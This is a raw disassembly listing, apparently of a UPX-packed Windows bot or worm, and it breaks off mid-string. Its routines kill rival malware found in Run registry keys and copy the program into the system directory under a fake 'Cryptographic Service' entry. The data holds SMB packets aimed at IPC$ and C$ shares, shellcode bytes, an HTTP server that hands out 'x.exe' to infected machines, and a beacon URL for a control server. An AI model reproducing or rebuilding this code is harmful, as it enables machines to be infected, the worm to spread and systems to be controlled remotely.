call sub_31421FF9 mov ebx, eax call sub_31422712 cmp ebx, 100007Fh jz short loc_314227FA push ebx push offset sub_3142255F call sub_31421F52 pop ecx pop ecx loc_314227FA: ; CODE XREF: UPX0:314227EBj mov dword ptr [esp+10h], 4 loc_31422802: ; CODE XREF: UPX0:31422813j push ebx push offset sub_314225C3 call sub_31421F52 dec dword ptr [esp+18h] pop ecx pop ecx jnz short loc_31422802 test ebp, ebp jle short loc_3142282A loc_31422819: ; CODE XREF: UPX0:31422828j push 0 push offset sub_3142264B call sub_31421F52 pop ecx dec ebp pop ecx jnz short loc_31422819 loc_3142282A: ; CODE XREF: UPX0:31422817j ; UPX0:31422836j ... call sub_31422038 test eax, eax jz short loc_31422838 push edi call esi ; Sleep jmp short loc_3142282A ; --------------------------------------------------------------------------- loc_31422838: ; CODE XREF: UPX0:31422831j ; UPX0:31422844j call sub_31422038 test eax, eax jnz short loc_31422846 push edi call esi ; Sleep jmp short loc_31422838 ; --------------------------------------------------------------------------- loc_31422846: ; CODE XREF: UPX0:3142283Fj call sub_31422712 jmp short loc_3142282A ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142284D proc near ; CODE XREF: sub_314229E6+93p ; sub_31422B67+11Ap arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax push 0F003Fh push 0 push [ebp+arg_4] push [ebp+arg_0] call dword_3142100C ; RegOpenKeyExA test eax, eax jnz short loc_31422880 push [ebp+arg_8] push [ebp+arg_4] call dword_31421010 ; RegDeleteValueA push [ebp+arg_4] call dword_31421014 ; RegCloseKey loc_31422880: ; CODE XREF: sub_3142284D+1Cj pop ebp retn sub_3142284D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422882 proc near ; CODE XREF: sub_314221C4+33p ; sub_314229E6+84p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx mov eax, [ebp+arg_10] push esi mov [ebp+var_4], eax lea eax, [ebp+arg_10] push eax xor esi, esi push 0F003Fh push esi push [ebp+arg_4] push [ebp+arg_0] call dword_3142100C ; RegOpenKeyExA test eax, eax jz short loc_314228AE push 1 pop eax jmp short loc_314228D8 ; --------------------------------------------------------------------------- loc_314228AE: ; CODE XREF: sub_31422882+25j lea eax, [ebp+var_4] push eax lea eax, [ebp+arg_4] push [ebp+arg_C] push eax push esi push [ebp+arg_8] push [ebp+arg_10] call dword_31421008 ; RegQueryValueExA test eax, eax jz short loc_314228CD push 2 pop esi loc_314228CD: ; CODE XREF: sub_31422882+46j push [ebp+arg_10] call dword_31421014 ; RegCloseKey mov eax, esi loc_314228D8: ; CODE XREF: sub_31422882+2Aj pop esi leave retn sub_31422882 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314228DB proc near ; CODE XREF: sub_31422A9B+96p ; sub_31422B67+7Cp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push esi xor esi, esi lea eax, [ebp+arg_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push [ebp+arg_4] push [ebp+arg_0] call dword_31421000 ; RegCreateKeyExA test eax, eax jz short loc_31422904 push 1 pop eax jmp short loc_3142292B ; --------------------------------------------------------------------------- loc_31422904: ; CODE XREF: sub_314228DB+22j push [ebp+arg_10] push [ebp+arg_C] push 1 push esi push [ebp+arg_8] push [ebp+arg_4] call dword_31421004 ; RegSetValueExA test eax, eax jz short loc_31422920 push 2 pop esi loc_31422920: ; CODE XREF: sub_314228DB+40j push [ebp+arg_4] call dword_31421014 ; RegCloseKey mov eax, esi loc_3142292B: ; CODE XREF: sub_314228DB+27j pop esi pop ebp retn sub_314228DB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142292E proc near ; CODE XREF: sub_314229E6+9Fp var_128 = dword ptr -128h var_120 = dword ptr -120h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 128h push ebx mov ebx, [ebp+arg_0] push esi push ebx call dword_31421084 ; lstrlenA mov esi, eax dec esi test esi, esi jle loc_314229E2 loc_3142294E: ; CODE XREF: sub_3142292E+27j cmp byte ptr [esi+ebx], 5Ch jz short loc_31422957 dec esi jns short loc_3142294E loc_31422957: ; CODE XREF: sub_3142292E+24j push 0 push 2 call sub_31422D2C ; CreateToolhelp32Snapshot cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_314229E2 push 128h lea eax, [ebp+var_128] push 0 push eax call sub_31422CD6 ; memset add esp, 0Ch lea eax, [ebp+var_128] mov [ebp+var_128], 128h push eax push [ebp+arg_0] call sub_31422D26 ; Process32First test eax, eax jz short loc_314229E2 lea esi, [esi+ebx+1] loc_3142299F: ; CODE XREF: sub_3142292E+B2j lea eax, [ebp+var_104] push eax push esi call dword_31421104 ; strstr pop ecx test eax, eax pop ecx jz short loc_314229CF push [ebp+var_120] push 0 push 1F0FFFh call dword_314210B0 ; OpenProcess push 0 push eax call dword_31421060 ; TerminateProcess loc_314229CF: ; CODE XREF: sub_3142292E+83j lea eax, [ebp+var_128] push eax push [ebp+arg_0] call sub_31422D20 ; Process32Next test eax, eax jnz short loc_3142299F loc_314229E2: ; CODE XREF: sub_3142292E+1Aj ; sub_3142292E+38j ... pop esi pop ebx leave retn sub_3142292E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314229E6 proc near ; CODE XREF: UPX0:3142237Bp var_13C = byte ptr -13Ch var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 13Ch push ebx push esi lea eax, [ebp+var_34] push edi mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager" mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter" mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service" mov [ebp+var_28], offset aBotLoader ; "Bot Loader" mov [ebp+var_24], offset aSystray ; "SysTray" mov [ebp+var_20], offset aWinupdate ; "WinUpdate" mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service" mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe" mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service" mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13" mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update" mov [ebp+var_4], eax mov [ebp+var_8], 0Bh mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... mov esi, 80000002h loc_31422A56: ; CODE XREF: sub_314229E6+AEj mov eax, [ebp+var_4] push 104h mov ebx, [eax] lea eax, [ebp+var_13C] push eax push ebx push edi push esi call sub_31422882 add esp, 14h test eax, eax jnz short loc_31422A8D push ebx push edi push esi call sub_3142284D lea eax, [ebp+var_13C] push eax call sub_3142292E add esp, 10h loc_31422A8D: ; CODE XREF: sub_314229E6+8Ej add [ebp+var_4], 4 dec [ebp+var_8] jnz short loc_31422A56 pop edi pop esi pop ebx leave retn sub_314229E6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1p ; sub_31422B67+132p var_78 = byte ptr -78h var_14 = byte ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 78h cmp [ebp+arg_0], 0 jz short loc_31422AB0 push [ebp+arg_0] call dword_31421074 ; DeleteFileA loc_31422AB0: ; CODE XREF: sub_31422A9B+Aj lea eax, [ebp+var_78] push 63h push eax call dword_3142108C ; GetSystemDirectoryA test eax, eax jz locret_31422B65 push esi call dword_314210FC ; rand and eax, 3 add eax, 5 push eax lea eax, [ebp+var_14] push eax call sub_31421F73 mov esi, dword_31421088 pop ecx pop ecx lea eax, [ebp+var_14] push offset dword_314241F0 push eax call esi ; lstrcatA lea eax, [ebp+var_78] push offset dword_314241F8 push eax call esi ; lstrcatA lea eax, [ebp+var_14] push eax lea eax, [ebp+var_78] push eax call esi ; lstrcatA lea eax, [ebp+var_78] push 0 push eax push [ebp+arg_4] call dword_31421050 ; CopyFileA lea eax, [ebp+var_78] push eax call dword_31421084 ; lstrlenA inc eax push eax lea eax, [ebp+var_78] push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_314228DB add esp, 14h push dword_31424FF4 call dword_3142107C ; CloseHandle lea eax, [ebp+var_78] push 0 push eax call dword_31421054 ; WinExec push 1F4h call dword_31421094 ; Sleep push 0 call dword_314210E0 ; ExitProcess pop esi locret_31422B65: ; CODE XREF: sub_31422A9B+23j leave retn sub_31422A9B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422B67 proc near ; CODE XREF: UPX0:31422380p var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_20 = byte ptr -20h push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi lea eax, [ebp+var_84] push 63h push eax push 0 call dword_31421048 ; GetModuleFileNameA test eax, eax jz loc_31422CA0 and dword_31425010, 0 lea eax, [ebp+var_20] push 1Dh push eax mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless" push offset aId ; "ID" mov esi, 80000002h push edi push esi call sub_31422882 add esp, 14h test eax, eax jz short loc_31422BED call dword_314210FC ; rand push 0Ah mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert" cdq pop ecx idiv ecx add edx, ecx push edx push ebx call sub_31421F73 pop ecx pop ecx push ebx call dword_31421084 ; lstrlenA inc eax push eax push ebx push offset aId ; "ID" push edi push esi call sub_314228DB add esp, 14h jmp short loc_31422BFC ; --------------------------------------------------------------------------- loc_31422BED: ; CODE XREF: sub_31422B67+4Dj lea eax, [ebp+var_20] push eax push offset aFgnsdrjyrsert ; "fgnsdrjyrsert" call dword_31421068 ; lstrcpyA loc_31422BFC: ; CODE XREF: sub_31422B67+84j lea eax, [ebp+var_E8] push 63h push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push esi call sub_31422882 add esp, 14h test eax, eax jz short loc_31422C42 push 2 push offset a1 ; "1" push offset aClient ; "Client" push edi push esi call sub_314228DB lea eax, [ebp+var_84] push eax push 0 call sub_31422A9B add esp, 1Ch jmp short loc_31422CA0 ; --------------------------------------------------------------------------- loc_31422C42: ; CODE XREF: sub_31422B67+B3j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call dword_3142104C ; lstrcmpiA test eax, eax jnz short loc_31422C8B lea eax, [ebp+var_20] push 1Dh mov ebx, offset aClient ; "Client" push eax push ebx push edi push esi call sub_31422882 add esp, 14h test eax, eax jnz short loc_31422CA0 push ebx push edi push esi mov dword_31425010, 1 call sub_3142284D add esp, 0Ch jmp short loc_31422CA0 ; --------------------------------------------------------------------------- loc_31422C8B: ; CODE XREF: sub_31422B67+F1j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call sub_31422A9B pop ecx pop ecx loc_31422CA0: ; CODE XREF: sub_31422B67+1Fj ; sub_31422B67+D9j ... pop edi pop esi pop ebx leave retn sub_31422B67 endp ; =============== S U B R O U T I N E ======================================= sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CAp ; sub_314215C7+11p ... arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31421044 ; VirtualAlloc retn sub_31422CA5 endp ; =============== S U B R O U T I N E ======================================= sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10Bp ; sub_314215C7+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31421040 ; VirtualFree retn sub_31422CB9 endp ; --------------------------------------------------------------------------- align 10h loc_31422CD0: ; DATA XREF: sub_31421422+Ao ; sub_314223B2+Ao jmp dword ptr loc_31421100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CD6 proc near ; CODE XREF: sub_31421801+128p ; sub_31421801+134p ... jmp dword_314210F8 sub_31422CD6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CDC proc near ; CODE XREF: sub_31421801+9Cp ; sub_31421801+C5p ... jmp dword_314210F4 sub_31422CDC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CE2 proc near ; CODE XREF: sub_31421801+93p ; sub_31421801+B2p ... jmp dword_314210F0 sub_31422CE2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31422CF0 proc near ; CODE XREF: sub_31421801+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31422D10 loc_31422CFC: ; CODE XREF: sub_31422CF0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31422CFC loc_31422D10: ; CODE XREF: sub_31422CF0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31422CF0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D20 proc near ; CODE XREF: sub_3142292E+ABp jmp dword_31421064 sub_31422D20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D26 proc near ; CODE XREF: sub_3142292E+64p jmp dword_3142105C sub_31422D26 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D2C proc near ; CODE XREF: sub_3142292E+2Dp jmp dword_31421058 sub_31422D2C endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 4B3h dup(0) dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_31421422+112o dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314215C7+84o align 10h byte_31424080 db 0 ; DATA XREF: sub_314216A2+1Br off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23r align 2 dd offset dword_314241D4 dw 0C401h dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55o ... dword_314241F8 dd 5Ch ; sub_31422A9B+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314211A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34o align 10h aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0 ; DATA XREF: sub_314215C7+57o align 8 byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24Eo ; sub_31421801+260o ... db 58h word_314242BA dw 7468h ; DATA XREF: sub_31422712+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_31421801+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 8 dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_31421801+BFo unicode 0, <C$>,0 a????? db '?????',0 dd 0 dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31424B00 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31424BBE dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0) ; DATA XREF: sub_31421801+41Bo ; sub_31421801+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31424C70: ; DATA XREF: sub_31421801+44Ao jmp short loc_31424C78 ; --------------------------------------------------------------------------- jmp short loc_31424C7A ; --------------------------------------------------------------------------- align 8 loc_31424C78: ; CODE XREF: UPX0:loc_31424C70j ; DATA XREF: sub_31421801+5Co pop esp pop esp loc_31424C7A: ; CODE XREF: UPX0:31424C72j and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o align 10h aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o align 4 aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao align 10h aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8o ; sub_314223B2+12Co align 10h aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5o ; UPX0:31422351o ... aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18o align 4 dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 4 aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 aGet db 'GET',0 ; DATA XREF: sub_3142207E+3Do aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233Co align 4 aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125o align 4 aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11Eo aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111o align 4 aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BDo align 4 aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6o aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AFo aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8o aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1o aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9Ao aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93o aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8Co align 4 aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85o aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7Eo aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77o aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70o aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69o align 4 aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62o align 4 aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54o align 4 aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46o align 4 aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3Fo align 4 aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38o align 4 aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31o align 4 aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2Ao align 4 aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do align 4 aSoftwareMicros db 